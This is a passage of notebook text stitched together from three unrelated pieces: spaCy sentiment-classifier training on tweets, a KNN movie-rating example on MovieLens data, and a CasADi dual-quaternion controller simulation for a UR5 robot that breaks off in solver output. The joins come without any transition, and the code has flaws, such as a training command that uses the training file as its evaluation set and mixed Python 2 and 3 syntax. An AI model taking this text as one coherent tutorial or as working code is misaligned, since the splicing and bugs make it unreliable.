"cats": {"BUSINESS": 1.0},}```This format works for training via code, as given in the examples above, There is also another format mentioned [here](https://spacy.io/api/annotationjson-input) `cats` is the only part we need to worry about, this must be where they look for categories/classes. We have three classes in our dataset - `0` for `Neutral`- `1` for `Positive`- `-1` for `Negative`and they are **mutually-exclusive** (There can be only one label for a sentence) We also need to split the training data we have to training and evaluation sets so that we can see how well our model has learnt the problem. 
Let's try to programmatically generate the training data from the pandas dataframe.label_map = {1:'POSITIVE', -1:'NEGATIVE', 0:'NEUTRAL'}We need a list of tuples of text and the annotation details in a dictionary, as mentioned above.# Adapted from sample data in https://spacy.io/usage/training#training-simple-style train_json = [ # Get the text from dataframe row (tweet.original_text, {'cats':{ label_map[tweet.sentiment_class]:1.0 } }) for tweet in train_data[['original_text', 'sentiment_class']].itertuples(index=False, name='Tweet') ] train_json[0]Now we will split the training data.from sklearn.model_selection import train_test_split # Stratified split with labels train_split, eval_split = train_test_split(train_json, test_size=0.2, stratify=train_data['sentiment_class']) len(train_split), len(eval_split)We should save them as `json` files to give as input to the command-line `train` utility in spacy.import json with Path(DRIVE_PATH/'train_clas.json').open('w') as f: json.dump(train_split, f) with Path(DRIVE_PATH/'eval_clas.json').open('w') as f: json.dump(eval_split, f)Validate data input for spacy Now we should check whether we have enough data to train the model with spacy's `train` CLI command; for that I will use Spacy's `debug-data` CLI command.!python -m spacy debug-data -h %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/Pretrained/train_clas.json \ /content/drive/My\ Drive/Spacy/Pretrained/eval_clas.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ✔ Corpus is loadable  =============================== Training stats =============================== Training pipeline: textcat Starting with blank model 'en' 0 training docs 0 evaluation docs ✘ No evaluation docs ✔ No overlap between training and evaluation data ✘ Low number of examples to train from a blank model (0)  ============================== Vocab & Vectors ============================== ℹ 0 total words in the data (0 unique) ℹ No word vectors present in the model[...]Data Generation (again) There must be something I missed, so I asked a question on [stackoverflow](https://stackoverflow.com/q/62003962/7752347) about this. It turns out we need the `.jsonl` format (again) and the script provided in the [repo](https://github.com/explosion/spaCy/tree/master/examples/training/textcat_example_data) to convert it to the json format required for training, so I need to change the data generation a little bit.train_jsonl = [ # Get the text from dataframe row {'text': tweet.original_text, 'cats': {v: 1.0 if tweet.sentiment_class == k else 0.0 for k, v in label_map.items()}, 'meta':{"id": str(tweet.Index)} } for tweet in train_data[['original_text', 'sentiment_class']].itertuples(index=True, name='Tweet') ] train_jsonl[0]So instead of a list of `tuples`, I now have a list of `dictionaries`.
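Since the classes are mutually exclusive, every record built above should carry all three labels with exactly one of them set to 1.0. A quick sanity check (a small sketch reusing `label_map` and `train_jsonl` from the cells above):
assert all(set(rec['cats']) == set(label_map.values()) for rec in train_jsonl)
assert all(sum(rec['cats'].values()) == 1.0 for rec in train_jsonl)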
We need to split again to have an evaluation set# Stratified split with labels train_split, eval_split = train_test_split(train_jsonl, test_size=0.2, stratify=train_data['sentiment_class']) len(train_split), len(eval_split) #hide srsly.write_jsonl(DRIVE_PATH.parent/'train_texts.jsonl', train_split) srsly.write_jsonl(DRIVE_PATH.parent/'eval_texts.jsonl', eval_split)We still need to convert the `jsonl` to the required `json` format, now for that I will use the script named `textcatjsonl_to_trainjson.py` in this [repo](https://github.com/explosion/spaCy/tree/master/examples/training/textcat_example_data). Let's download the script from the repo.!wget -O script.py https://raw.githubusercontent.com/explosion/spaCy/master/examples/training/textcat_example_data/textcatjsonl_to_trainjson.py %%bash python script.py -m en /content/drive/My\ Drive/Spacy/train_texts.jsonl /content/drive/My\ Drive/Spacy python script.py -m en /content/drive/My\ Drive/Spacy/eval_texts.jsonl /content/drive/My\ Drive/SpacyLet's try to debug again Validate (again)#hide_input %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/eval_texts.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ✔ Corpus is loadable  =============================== Training stats =============================== Train[...]It worked !, Thanks to the answerer of this [question](https://stackoverflow.com/q/62003962/7752347), now we know that our data format is correct. Turns out there is another command to `convert` our files to spacy's JSON format which is mentioned [here](https://spacy.io/api/cliconvert).The output is pointing out that the evaluation set has some **data leakage**. I will try to remove that now.new_eval = [annot for annot in eval_split if all([annot['text'] != t['text'] for t in train_split])] len(new_eval), len(eval_split)We thought there were 5 samples leaking into the training data, it is six here, anyway let's try to validate the data again.#hide srsly.write_jsonl(DRIVE_PATH.parent/'eval_texts.jsonl', new_eval) #hide !python script.py -m en /content/drive/My\ Drive/Spacy/eval_texts.jsonl /content/drive/My\ Drive/Spacy %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/eval_texts.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... 
⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ✔ Corpus is loadable  =============================== Training stats =====================[...]We are all set to start training now! Classifier Training I have made the command to train in CLI, Please refer the comments for details in the order of the arguments given here%%bash ## Arguement info # Language of text in which the Model is going to be trained # Path to store model # Training data json path # Evaluation data json path # Pipeline components that we are going to train # Number of iterations in total # Nummber of iterations to wait before improvement in eval accuracy # Pretrained model to start with # version # Augmentation for data(2 params) # Model Architecture for text classifier (cnn + bow) (python -m spacy train \ en \ -b en_core_web_sm \ /content/drive/My\ Drive/Spacy/Classifier \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/train_texts.json \ -p "textcat" \ -n 100 \ -ne 10 \ -t2v /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter/model49.bin \ -V 0.1 \ -nl 0.1 \ -ovl 0.1)Training pipeline: ['textcat'] Starting with base model 'en_core_web_sm' Adding component to base model 'textcat' Counting training words (limit=0) Loaded pretrained tok2vec for: [] Textcat evaluation score: F1-score macro-averaged across the labels 'POSITIVE, NEGATIVE, NEUTRAL' Itn Textcat Loss Textcat Token % CPU WPS --- ------------ ------- ------- ------- 1 26.738 39.853 100.000 177034 2 5.179 65.120 100.000 157933 3 1.483 76.615 100.000 178008 4 0.686 83.266 100.000 177567 5 0.288 86.236 100.000 169033 6 0.151 88.381 100.000 176679 7 0.090 90.099 100.000 166485 8 0.057 91.000 100.000 171279 9 0.135 92.472 100.000 175907 10 0.028 93.237 100.000 171838 11 0.023 94.147 100.000 175174 12 0.022 94.729 100.000 155840 13 0.021 95.248 100.000 161975 14 0.021 95.485 100.000 168029[...]I also tried to train without the pretrained model (ie)`en_core_web_sm`, The logs for that are here below. (Uncollapse to view), the results are not very different, the evaluation metrics are off the roof. 
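Before reading too much into those numbers, note that in the `spacy train` command above the training and evaluation data arguments both point to train_texts.json, so the reported F1 is effectively measured on the training set. A minimal sketch for re-scoring the best model on the held-out eval split (paths assumed from the earlier cells, scoring done with scikit-learn rather than spaCy's own scorer):
import json
import spacy
from pathlib import Path
from sklearn.metrics import f1_score
clf = spacy.load(Path("/content/drive/My Drive/Spacy/Classifier/model-best"))
texts, gold = [], []
for line in Path("/content/drive/My Drive/Spacy/eval_texts.jsonl").open():
    rec = json.loads(line)
    texts.append(rec["text"])
    gold.append(max(rec["cats"], key=rec["cats"].get))  # label flagged with 1.0
pred = [max(doc.cats, key=doc.cats.get) for doc in clf.pipe(texts)]
print(f1_score(gold, pred, average="weighted"))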
We need to predict the test data and try to submit to the competition for a better picture of the model.#collapse %%bash ## Arguement info # Language of text in which the Model is going to be trained # Path to store model # Training data json path # Evaluation data json path # Pipeline components that we are going to train # Number of iterations in total # Nummber of iterations to wait before improvement in eval accuracy # Pretrained model to start with # version # Augmentation for data(2 params) # Model Architecture for text classifier (cnn + bow) (python -m spacy train \ en \ /content/drive/My\ Drive/Spacy/Classifier_without_using_websm \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/train_texts.json \ -p "textcat" \ -n 100 \ -ne 10 \ -t2v /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter/model49.bin \ -V 0.1 \ -nl 0.1 \ -ovl 0.1)✔ Created output directory: /content/drive/My Drive/Spacy/Classifier_without_using_websm Training pipeline: ['textcat'] Starting with blank model 'en' Counting training words (limit=0) Loaded pretrained tok2vec for: [] Textcat evaluation score: F1-score macro-averaged across the labels 'POSITIVE, NEGATIVE, NEUTRAL' Itn Textcat Loss Textcat Token % CPU WPS --- ------------ ------- ------- ------- 1 26.755 40.980 100.000 166278 2 5.293 65.846 100.000 172083 3 1.506 76.992 100.000 175595 4 0.695 83.314 100.000 173543 5 0.293 86.284 100.000 172609 6 0.156 88.784 100.000 171486 7 0.091 90.136 100.000 161118 8 0.056 91.761 100.000 156752 9 0.112 92.442 100.000 167948 10 0.028 93.329 100.000 162446 11 0.024 94.144 100.000 165753 12 0.022 95.206 100.000 168336 13 0.021 95.769 100.000 1[...]Prediction on test datatest_data = pd.read_csv(DATA_PATH/'test.csv', index_col=0) test_data.head()Clean test data We will clean the test data of links with regex as well.test_data['original_text'].replace( # Regex pattern to match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True) test_data.shape list_of_test_texts = test_data['original_text'].tolist()Let's load the Spacy model from our trainingimport spacy textcat_mod = spacy.load(DRIVE_PATH.parent/'Classifier/model-best')I will try to fasten the prediction by using multithreading as mentioned [here](https://explosion.ai/blog/multithreading-with-cython)d = textcat_mod(list_of_test_texts[0]) d.cats max(d.cats, key=lambda x: d.cats[x]) # to facilitate mapping the predictions label_map = {'POSITIVE':1, 'NEGATIVE':-1, 'NEUTRAL':0} # to gather predictions preds = [] for doc in textcat_mod.pipe(list_of_test_texts, n_threads=4, batch_size=100): pred_cls = max(doc.cats, key=lambda x: doc.cats[x]) preds.append(label_map[pred_cls]) len(preds), len(list_of_test_texts)Let's form the submissionsub_df = pd.DataFrame( preds, index=test_data.index, columns=['sentiment_class'] ) sub_df.shape sub_df.head() sub_df.to_csv(DRIVE_PATH.parent/'submission.csv')The submitted predictions scored a mere `39/100` in weighted f1-score, that's disappointing. -_- Let's analyze the predictions Prediction distributionsub_df['sentiment_class'].value_counts().plot(kind='bar') sub_df['sentiment_class'].value_counts()This looks very similar to the train datatrain_data['sentiment_class'].value_counts()Knn is a simple concept. It defines some distance between the items in your dataset and find the K closest items. You can use those items to predict some property of a test item, and vote for it. As an example , lets look at a movie prediction system . 
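Before working with the real ratings data, here is a tiny toy sketch (made-up genre vectors and popularity scores) of the distance idea used below: cosine distance between genre vectors plus the gap in normalized popularity.
import numpy as np
from scipy import spatial
# Hypothetical movies: (genre indicator vector, normalized popularity)
movie_a = (np.array([0, 1, 1, 0]), 0.80)
movie_b = (np.array([0, 1, 0, 0]), 0.65)
genre_distance = spatial.distance.cosine(movie_a[0], movie_b[0])  # 0 means identical genres
popularity_distance = abs(movie_a[1] - movie_b[1])
print(genre_distance + popularity_distance)  # smaller value = more similar movies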
Lets try to guess the rating of the movie by looking at the 10 movies that are closest in terms of genres and popularity. In this project, we will load up every rating in the dataset into a pandas Dataframe.import pandas as pd import numpy as np r_cols = ['user id', 'movie_id', 'rating'] ratings = pd.read_csv('C:/Users//Desktop/DataScience/DataScience-Python3/ml-100k/u.data', sep='\t', names=r_cols, usecols=range(3)) ratings.head()grouping everything by movie ID and compute the total number of ratings(each movie's popularity) and the average rating of every moviemovieProperties = ratings.groupby('movie_id').agg({'rating': [np.size, np.mean]}) movieProperties.head() #The raw number of ratings isnt very useful for computing distances between movies , so we will create a new DataFrame that contains the normalized number of ratings.So, a value of 0 means nobody rated it and a value of 1 will mean it is the most popular movie here movieNumRatings = pd.DataFrame(movieProperties['rating']['size']) movieNormalizedNumRatings = movieNumRatings.apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x))) movieNormalizedNumRatings.head() #now let's get the genre information from the u.item file . The way this works is there are 19 fields, each corresponding to a specific genre - a value of 0 means , it is not in the genre and a value of 1 means that is in that genre. A movie may have more than one genre associated with it . Each is put into a big python dictionary called movieDict. Every entry contains the movie name, list of genres, normalized popularity score, the average rating of the movie movieDict = {} with open('C:/Users//Desktop/DataScience/DataScience-Python3/ml-100k/u.item') as f: temp = '' for line in f: fields = line.rstrip('\\n').split('|') movieID = int(fields[0]) name = fields[1] genres = fields[5:25] genres = map(int, genres) movieDict[movieID] = (name, np.array(list(genres)), movieNormalizedNumRatings.loc[movieID].get('size'), movieProperties.loc[movieID].rating.get('mean')) movieDict[1] from scipy import spatial def ComputeDistance(a, b): genresA = a[1] genresB = b[1] genreDistance = spatial.distance.cosine(genresA, genresB) popularityA = a[2] popularityB = b[2] popularityDistance = abs(popularityA - popularityB) return genreDistance + popularityDistance ComputeDistance(movieDict[2], movieDict[4]) #The higher the distance, the less similar the movies are print (movieDict[2]) print (movieDict[4]) import operator def getNeighbors(movieID, K): distance = [] for movie in movieDict: if (movie != movieID): dist = ComputeDistance(movieDict[movieID], movieDict[movie]) distance.append((movie, dist)) distance.sort(key=operator.itemgetter(1)) neighbors = [] for x in range(K): neighbors.append(distance[x][0]) return neighbors K = 5 avgRating = 0 neighbors = getNeighbors(1,K) for neighbor in neighbors: avgRating += movieDict[neighbor][3] print (movieDict[neighbor][0] + " " + str(movieDict[neighbor][3])) avgRating /= float(K) avgRating movieDict[1]Graphs in articleThis notebook generates figures from the article. Specifically, the transformation matrix vs dual quaternion figures. The code is not well commented, and the results are not discussed other than in the article. 
Quaternion and Dual quaternion functionsLet's convert some casadi_geom expressions into casadi functions so they work with MX variables# Quaternions quat1 = cs.SX.sym("quat1",4) quat2 = cs.SX.sym("quat2",4) quaternion_product = cs.Function("quatprod",[quat1,quat2],[casadi_geom.quaternion_product(quat1,quat2)]) quaternion_conj = cs.Function("quatconj", [quat1], [casadi_geom.quaternion_conj(quat1)]) hamilton_operator_plus = cs.Function( "hamilton_operator_plus", [quat1], [cs.vertcat(cs.horzcat(quat1[3], -quat1[2], quat1[1], quat1[0]), cs.horzcat(quat1[2], quat1[3], -quat1[0], quat1[1]), cs.horzcat(-quat1[1], quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3]))]) hamilton_operator_minus = cs.Function( "hamilton_operator_minus", [quat1], [cs.vertcat(cs.horzcat(quat1[3], quat1[2], -quat1[1], quat1[0]), cs.horzcat(-quat1[2], quat1[3], quat1[0], quat1[1]), cs.horzcat(quat1[1], -quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3]))]) # Dual quaternions quat1 = cs.SX.sym("quat1",8) # Dual quaternions quat2 = cs.SX.sym("quat2",8) dual_quaternion_product = cs.Function("dualquatprod", [quat1,quat2], [casadi_geom.dual_quaternion_product(quat1,quat2)]) dual_quaternion_conj = cs.Function("dualquatconj", [quat1], [casadi_geom.dual_quaternion_conj(quat1)]) dual_quaternion_dualnorm = cs.Function("dualquatdualnorm", [quat1], [casadi_geom.dual_quaternion_norm2(quat1)[0],casadi_geom.dual_quaternion_norm2(quat1)[1]]) dual_quaternion_inv = cs.Function("dualquatinv", [quat1], [casadi_geom.dual_quaternion_inv(quat1)]) dual_quaternion_to_transformation_matrix = cs.Function("dualquat2transfmat", [quat1], [casadi_geom.dual_quaternion_to_transformation_matrix(quat1)]) dual_quaternion_to_pos = cs.Function("dualquat2pos", [quat1], [casadi_geom.dual_quaternion_to_pos(quat1)]) dual_hamilton_operator_plus = cs.Function( "dH_plus", [quat1], [cs.vertcat( cs.horzcat(quat1[3], -quat1[2], quat1[1], quat1[0], 0, 0, 0, 0), cs.horzcat(quat1[2], quat1[3], -quat1[0], quat1[1], 0, 0, 0, 0), cs.horzcat(-quat1[1], quat1[0], quat1[3], quat1[2], 0, 0, 0, 0), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3], 0, 0, 0, 0), cs.horzcat(quat1[7], -quat1[6], quat1[5], quat1[4], quat1[3], -quat1[2], quat1[1], quat1[0]), cs.horzcat(quat1[6], quat1[7], -quat1[4], quat1[5], quat1[2], quat1[3], -quat1[0], quat1[1]), cs.horzcat(-quat1[5], quat1[4], quat1[7], quat1[6], -quat1[1], quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[4], -quat1[5], -quat1[6], quat1[7], -quat1[0], -quat1[1], -quat1[2], quat1[3]) )] ) dual_hamilton_operator_minus = cs.Function( "dH_minus", [quat1], [cs.vertcat( cs.horzcat(quat1[3], quat1[2], -quat1[1], quat1[0], 0, 0, 0, 0), cs.horzcat(-quat1[2], quat1[3], quat1[0], quat1[1], 0, 0, 0, 0), cs.horzcat(quat1[1], -quat1[0], quat1[3], quat1[2], 0, 0, 0, 0), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3], 0, 0, 0, 0), cs.horzcat(quat1[7], quat1[6], -quat1[5], quat1[4], quat1[3], quat1[2], -quat1[1], quat1[0]), cs.horzcat(-quat1[6], quat1[7], quat1[4], quat1[5], -quat1[2], quat1[3], quat1[0], quat1[1]), cs.horzcat(quat1[5], -quat1[4], quat1[7], quat1[6], quat1[1], -quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[4], -quat1[5], -quat1[6], quat1[7], -quat1[0], -quat1[1], -quat1[2], quat1[3]) )] ) # Roll pitch yaw Euler angles xyz=cs.SX.sym("xyz",3) rpy=cs.SX.sym("rpy",3) dual_quaternion_rpy = cs.Function("dualquatrpy", [rpy], [casadi_geom.dual_quaternion_rpy(rpy)]) dual_quaternion_xyz = cs.Function("dualquatxyz", [xyz], 
[casadi_geom.dual_quaternion_translation(xyz)]) # Axis angle axis = cs.SX.sym("axis",3) ang = cs.SX.sym("ang") dual_quaternion_axis_translation = cs.Function("dualquataxistransl", [axis, ang], [casadi_geom.dual_quaternion_axis_translation(axis,ang)]) dual_quaternion_axis_rotation = cs.Function("dualquataxisrot", [axis, ang], [casadi_geom.dual_quaternion_axis_rotation(axis,ang)])UR5 - Dual Quaternion or Transformation Matrix representationTransformation matrices are a 16 element representation of the transformation between frames, with 12 unique elements. This represents the transformation as a rotation matrix and a displacement vector. Usually in robotics one follows the convention of first translating then rotating to match frames. Another representation is dual quaternions, they use two quaternions to represent the rotation and displacement of transformations and use 8 elements to describe the same transformation. In this example we will try to move from the HOME position to a desired frame, then later from a random frame to a random frame.t = cs.MX.sym("t") q = cs.MX.sym("q",6) # six actuated joints dq = cs.MX.sym("dq",6) UR5_home = [0.0, -cs.np.pi/2, 0.0, -cs.np.pi/2, 0.0, 0.0]Get forward kinematicsThe converter creates a kinematic chain from a specific root link to an end link. Running `check_urdf` on the file, we find that the UR5 contains the links:```root Link: world has 1 child(ren) child(1): base_link child(1): base child(2): shoulder_link child(1): upper_arm_link child(1): forearm_link child(1): wrist_1_link child(1): wrist_2_link child(1): wrist_3_link child(1): ee_link child(2): tool0```Let's set up the forward kinematics:urdf_path = "./urdf/ur5.urdf" links = ["world", "base_link", "base", "shoulder_link", "upper_arm_link", "forearm_link", "wrist_1_link", "wrist_2_link", "wrist_3_link", "tool0"] fk_dict = converter.from_file(root="base_link", tip="tool0", filename=urdf_path) print(str(fk_dict["joint_names"])) # Setup the function for the dual quaternion of the forward kinematics: Q_fk = fk_dict["dual_quaternion_fk"] # Setup the function for the transformation matrix of the forward kinematics: T_fk = fk_dict["T_fk"] # Test transformation matrix: Q0 = Q_fk(UR5_home) T0 = numpy_geom.dual_quaternion_to_transformation_matrix(Q0.toarray()) print("Distance to UR5_pome pos with dual quaternions: "+str(cs.norm_2(T0[:3,3]))) # Test transformation matrix: T0 = T_fk(UR5_home) print("Distance to UR5Home pos with transformation matrices: "+str(cs.norm_2(T0[:3,3])))Distance to UR5_pome pos with dual quaternions: 1.0192 Distance to UR5Home pos with transformation matrices: 1.0192UR5 LimitsTo achieve reasonable simulations, we impose some realistic limits on the robot. 
We grab the joint limits from the URDF and choose a reasonable max speed.# Check the joint limits from the URDF: q_max = cs.np.array(fk_dict["upper"]) q_min = cs.np.array(fk_dict["lower"]) print("q_min ",str(q_min)) print("q_max ",str(q_max)) # Define a reasonable max joint speed max_speed = cs.np.pi/5 # rad/s print("Max speed: ", max_speed) dt = 0.008 # Define the basic system limits # Uphold the joint constraints joint_limits_cnstr = cc.SetConstraint( label="Joint_Limits", expression = q, set_min = q_min, set_max = q_max) # Listify the joint limits constraints for pseudoinverse, starting with the lowest joint_limits_cnstr_list = [] for i in range(q.size()[0]): joint_limits_cnstr_list.append( cc.SetConstraint(label="limit_q_"+str(i), expression=q[i], set_min = q_min[i], set_max = q_max[i], priority = i)) # Let's have some speed limit joint_speed_limits_cnstr = cc.VelocitySetConstraint( label="Joint_speed_limits", expression = q, set_min = -cs.vertcat([max_speed]*q.size()[0]), set_max = cs.vertcat([max_speed]*q.size()[0]))Move from home to frameIn this section we will move from the HOME position to a desired frame. There are multiple methods of representing a constraint that could achieve this, and we will investigate two for each representation.# Desired frame rpy = [ 5.*(cs.np.pi/180.0),#5.*(cs.np.pi/180.0), 0.*(cs.np.pi/180.0),#0.5*cs.np.pi, 0.*(cs.np.pi/180.0) ] xyz = [ 0.5, 0.0, 0.5 ] # As a dual quaternion Q_des = numpy_geom.dual_quaternion_revolute(xyz, rpy, # cartesian and euler angles [1,0,0],0.0) # If we wanted an extra axis-angle rotation afterwards # As a transformation matrix T_des = cs.np.eye(4) T_des[:3,:3] = numpy_geom.rotation_rpy(*rpy) T_des[:3,3] = xyz # Some desired positionConstraint representations - Dual quaternion# Deviation from identity Q_id = numpy_geom.dual_quaternion_revolute([0.,0.,0.],[0.,0.,0.],[1.,0.,0.],0.0) Q_dist1 = dual_quaternion_product(Q_fk(q),dual_quaternion_conj(Q_des)) - Q_id Q_dist1_cnstr = cc.EqualityConstraint( label="Q_dist1_cnstr", expression=Q_dist1, constraint_type="soft", gain = 10.0, priority=301 ) Q_dist1_cnstr.eval = cs.Function("Q_dist1",[t,q],[cs.norm_2(Q_dist1)]) Hm = dual_hamilton_operator_minus(Q_des) Cconj = cs.diag([-1,-1,-1,1,-1,-1,-1,1]) Q_dist2 = cs.mtimes(Hm, cs.mtimes(Cconj, Q_des-Q_fk(q))) Q_dist2_cnstr = cc.EqualityConstraint( label="Q_dist2_cnstr", expression=Q_dist2, constraint_type="soft", gain=10.0, priority=301 ) Q_dist2_cnstr.eval = cs.Function("Q_dist2",[t,q], [cs.norm_2(Q_dist2)])Constraint representations - Transformation matrix# Deviation from identity T_dist1_cnstr = cc.EqualityConstraint( label="T_dist1", expression=cs.norm_fro(cs.mtimes(cs.inv(T_des),T_fk(q))-cs.np.eye(4)), gain=10.0, constraint_type="soft", priority=301 ) T_dist1_cnstr.eval = cs.Function("f_T_dist1", [t,q],[T_dist1_cnstr.expression]) # Frobenius norm of rotation deviation from identity, Position deviation T_dist2_cnstr = cc.EqualityConstraint( label="T_dist2", expression = cs.vertcat(T_fk(q)[:3,3]-T_des[:3,3], cs.norm_fro(cs.mtimes(cs.inv(T_des[:3,:3]),T_fk(q)[:3,:3]) - cs.np.eye(3))), gain = 10.0, constraint_type = "soft", priority = 300 ) T_dist2_cnstr.eval = cs.Function("f_T_dist2", [t,q], [cs.norm_2(T_dist2_cnstr.expression)]) # Three point strategy T_dist3_cnstr = cc.EqualityConstraint( label="T_dist3", expression = cs.vertcat(T_fk(q)[0, :3].T + T_fk(q)[:3,3] - T_des[0, :3] - T_des[:3,3], T_fk(q)[1, :3].T + T_fk(q)[:3,3] - T_des[1, :3] - T_des[:3,3], T_fk(q)[2, :3].T + T_fk(q)[:3,3] - T_des[2, :3] - T_des[:3,3]), gain=10.0, 
constraint_type= "soft", priority=300 ) T_dist3_cnstr.eval = cs.Function("f_T_dist3", [t,q], [cs.norm_2(T_dist3_cnstr.expression)])Compiling the controllers for all constraint situations# Let's test all the available controllers controller_classes = { "qp":cc.ReactiveQPController, "nlp":cc.ReactiveNLPController, "pinv":cc.PseudoInverseController, "mpc":cc.ModelPredictiveController } controllers = {} for key in controller_classes.keys(): controllers[key] = {} cnstr_situations={ "Q_dist1":Q_dist1_cnstr, "Q_dist2":Q_dist2_cnstr, "T_dist1":T_dist1_cnstr, "T_dist2":T_dist2_cnstr, "T_dist3":T_dist3_cnstr} print cnstr_situations.keys() # Compile all the controllers for each situation for cnstr in cnstr_situations.keys(): print("Compiling constraint: "+str(cnstr)) for key in controllers.keys(): if key == "pinv": #constraints = joint_limits_cnstr_list + [cnstr_situations[cnstr]] #constraints = [joint_limits_cnstr, cnstr_situations[cnstr]] constraints = [cnstr_situations[cnstr]] else: #constraints = [joint_limits_cnstr, joint_speed_limits_cnstr, cnstr_situations[cnstr]] constraints = [joint_limits_cnstr, cnstr_situations[cnstr]] #constraints = [cnstr_situations[cnstr]] skill_spec = cc.SkillSpecification( label=cnstr+"_skill", time_var=t, robot_var=q, constraints=constraints ) t0 = time.time() if key == "mpc": controllers[key][cnstr] = controller_classes[key](skill_spec=skill_spec, horizon_length=10, timestep=dt) else: controllers[key][cnstr] = controller_classes[key](skill_spec=skill_spec) if key == "pinv": controllers[key][cnstr].options["multidim_sets"] = True controllers[key][cnstr].options["pinv_method"] = "damped" controllers[key][cnstr].options["damping_factor"] = 1e-26 controllers[key][cnstr].setup_problem_functions() controllers[key][cnstr].setup_solver() print("\t-"+str(key)+", compile time: "+str(time.time()-t0)) timesteps = 1000 # Run all simulations for cntr_key in controllers.keys(): print("Simulating controller: "+str(cntr_key)) for cnstr_key in cnstr_situations.keys(): print("\t-"+str(cnstr_key)) print("\t\tSetting up initial value problem") controllers[cntr_key][cnstr_key].setup_initial_problem_solver() print("\t\tSolving initial value problem") slack_res = controllers[cntr_key][cnstr_key].solve_initial_problem(0,UR5_home)[-1] t0 = time.time() # Simulate it! 
t_sim = cs.np.array([dt*i for i in range(timesteps+1)]) t_run_sim = cs.np.array([dt*i for i in range(timesteps)]) # Robot q_sim = cs.np.zeros((len(t_sim),q.shape[0])) q_sim[0,:] = UR5_home dq_sim = cs.np.zeros((len(t_sim),dq.shape[0])) # Cartesian position p_sim = cs.np.zeros((len(t_sim), 3)) p_sim[0,:] = T_fk(UR5_home)[:3,3].toarray()[:,0] # Rotation R_sim = cs.np.zeros((len(t_sim), 3, 3)) R_sim[0,:,:] = T_fk(UR5_home)[:3,:3].toarray() # Error in constraint e_sim = cs.np.zeros(len(t_sim)) e_sim[0] = cnstr_situations[cnstr_key].eval(t_sim[0],q_sim[0,:]) # Loop for i in range(len(t_sim) - 1): t_run0 = time.time() res = controllers[cntr_key][cnstr_key].solve(t_sim[i],q_sim[i,:],warmstart_slack_var=slack_res) t_run_sim[i] = time.time() - t_run0 dq_sim[i,:] = res[0].toarray()[:,0] if res[-1] is not None: slack_res = res[-1].toarray()[:,0] for idx, dqi in enumerate(dq_sim[i,:]): dq_sim[i,idx] = max(min(dqi,max_speed),-max_speed) q_sim[i+1,:] = q_sim[i,:] + dq_sim[i,:]*dt p_sim[i+1,:] = T_fk(q_sim[i+1,:])[:3,3].toarray()[:,0] R_sim[i+1,:,:] = T_fk(q_sim[i+1,:])[:3,:3].toarray() e_sim[i+1] = cnstr_situations[cnstr_key].eval(t_sim[i],q_sim[i+1,:]) controllers[cntr_key][str(cnstr_key)+"_res"] = { "t_sim":t_sim, "dq_sim": dq_sim, "q_sim": q_sim, "p_sim": p_sim, "R_sim": R_sim, "e_sim": e_sim, "t_run_sim": t_run_sim } print("\t\tRuntime: "+str(time.time()-t0))Simulating controller: qp -T_dist2 Setting up initial value problem Solving initial value problem Runtime: 0.506732940674 -Q_dist2 Setting up initial value problem Solving initial value problem Runtime: 0.492563009262 -Q_dist1 Setting up initial value problem Solving initial value problem Runtime: 0.486197948456 -T_dist1 Setting up initial value problem Solving initial value problem Runtime: 0.438336133957 -T_dist3 Setting up initial value problem Solving initial value problem Runtime: 0.518247127533 Simulating controller: nlp -T_dist2 Setting up initial value problem Solving initial value problem ****************************************************************************** This program contains Ipopt, a library for large-scale nonlinear optimization. Ipopt is released as open source 